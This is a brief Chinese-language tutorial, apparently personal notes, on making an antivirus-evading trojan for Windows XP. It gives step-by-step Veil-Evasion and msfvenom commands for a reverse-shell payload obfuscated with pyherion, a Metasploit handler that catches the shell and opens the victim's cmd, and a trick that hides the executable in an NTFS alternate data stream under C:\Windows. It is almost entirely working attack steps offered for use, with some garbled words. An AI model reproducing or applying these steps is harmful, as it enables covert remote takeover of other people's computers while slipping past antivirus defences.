veil-evasion 在xp下的三分之二免杀

1.apt-get install veil-evasion

2.List  --查找相应的木马生成模块

3.选择35

4.Options --查看需要设置的选项

5.Set use_pyherion Y

6.Generate

7.选择1.msfvenom（defualt）

8.设置本机ip10.10.10.128，端口4444

9.重命名木马xx.rc

10.选择1pyinstaller（default）

11.找到生成的木马文件和.rc文件

12.Msfconsole xx.rc

或者手动设置要反弹的ip和端口

Use explpit/multi/handler

Set lhost 10.10.10.128

Set lport 4444

Exploit

sysinfo 查看系统相关信息

Shell 进入windows的cmd下

------------三分之一完美的免杀-------------

三分之二针对的是xp附近的系统

通过msf的数量特性来进行文件隐藏，达到真正的三分之二免杀隐藏木马的效果

 

1.在xp下创建一个空目录

md demon1234

2.把木马嵌入此目录demon1234

Type 1.exe demon1234:123.exe

3.把木马文件删除

4.demon1234空文件夹成为一个木马文件，此时还需要一个命令来执行

5.把demon1234放到windows文件夹下

6.start c:/windows/demon1234:123.exe